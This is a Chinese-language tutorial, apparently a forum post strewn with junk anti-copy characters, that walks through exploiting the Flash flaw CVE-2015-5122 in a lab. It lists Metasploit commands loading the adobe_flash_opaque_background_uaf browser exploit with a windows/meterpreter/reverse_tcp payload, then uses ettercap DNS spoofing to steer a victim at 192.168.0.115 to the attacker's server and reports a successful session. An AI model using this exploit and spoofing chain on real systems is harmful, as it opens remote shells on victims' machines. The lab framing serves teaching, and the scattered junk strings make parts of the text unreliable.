5 j% V7 t2 v5 o# [3 z5 J
二、cve2015-5122漏洞实例演示虚拟机 ! a2 O9 Z* \0 o
* }! `$ b- @2 m; [$ m% ~
5 \6 u; C2 T, S( b$ A 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 8 \0 N2 W; b/ a
/ A) Q! T6 W; ^2 V. G8 B
: J8 n3 v7 G+ E; I+ o9 V( c
search cve-2015-5122如图: 5 [$ j6 O, B; O, G
2 f- ~; t) q: l# k
8 s# G/ X2 H3 c6 Y4 k* V5 Q
. [* P$ ?5 D' x6 T
, |, x6 N& n* ~) a% k1 `5 y% p7 b- G' \; V2 k9 i+ o3 ?: |* v" e% x' E
下面我们敲如下命令: & E" z" Q! V1 A& U; P7 f; G
6 C) n7 d* h, \2 ]. f$ U2 y3 L
: S( y7 y3 N ?6 {$ g* x3 F
use exploit/multi/browser/adobe_flash_opaque_background_uaf
: w, C9 N% Z- R5 K3 V* v I% i5 W2 D% o7 q
' _- [3 ~4 m3 a, o set PAYLOAD windows/meterpreter/reverse_tcp ( X; c8 r* p* `8 |3 w) s" x: h
& {' n( {- ~1 R8 Y! T7 e( \; M- M! H" F/ s+ w6 T- P% m- n
set LHOST 192.168.0.109
) r# f3 ~7 q: u/ x! A/ a: i9 q
}* O7 L X' B7 K
# V8 q8 X$ r D7 k set URIPATH / /*根目录*/
3 S& m2 m2 B8 F, v( B 8 X7 p0 E W: o: j: O" y( |, k2 O
: K9 ?: U5 q6 t: t
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
) `2 }' J9 s/ I7 F7 D
+ t2 Z4 [- J- Z3 C) _
D# f. [$ s8 {( @3 i set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 * D1 u$ X3 z5 ]( O+ g
7 c) M+ d5 W v9 H9 N2 k9 F8 u. {" s( g0 N, f1 H
然后show options如图:
0 v M3 p: F4 U1 X, c) K- z " x# {% C7 R6 I. g8 ?6 [1 y. P
5 m7 c1 @! J( H" b, c
- w* `$ O, G$ o2 P
2 \. F/ X$ y% x( w0 q8 w- `' G2 ?3 N F& |
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: ' ]1 f) O6 u% b/ s; ~+ J
( o4 R- d( t2 o 0 J9 f2 d+ R3 E0 N
6 @2 O: ~: e3 s9 `' a" r
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 9 u6 U' Q$ J% K4 L& w1 j
+ G- ?8 g# h! \4 D# p
9 T. a4 n- W4 H+ c, Y) D9 W" E Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 2 {' E. m! ^) f2 `8 J7 P& [. r& |
6 X2 c. T, j) ]2 m+ k
, q3 O2 Y/ e( v: {5 g7 j
4 Z2 Q+ V6 n% x) ~
$ u9 K h& A6 W/ I9 q: W. p( I. g
: H# p- L3 o2 N K 成功了,这时候我们断开ettercap,如图:
3 d6 p d* R+ d* J2 }7 N1 j
7 ?9 n n5 s! L, A- D0 f2 \. T. ?
# {/ T* ^8 Y) n3 |
% a: n/ f3 T& U* c : t$ K6 x' E- W1 I
+ m5 v% q9 P$ K1 U1 _2 f0 S! p' O Screenshot如图:
! B. |. _- Q) Q! [. z7 f( o/ L
& @% O8 x0 f: C E; P" e) l/ d0 P# h1 ^. l5 Y0 p
" ?! N; _' l/ ]2 A
+ d7 l4 a9 B4 S+ j
2 J1 r* n1 ^( m; R/ h i' R+ U
8 H1 q* g* C2 f1 l |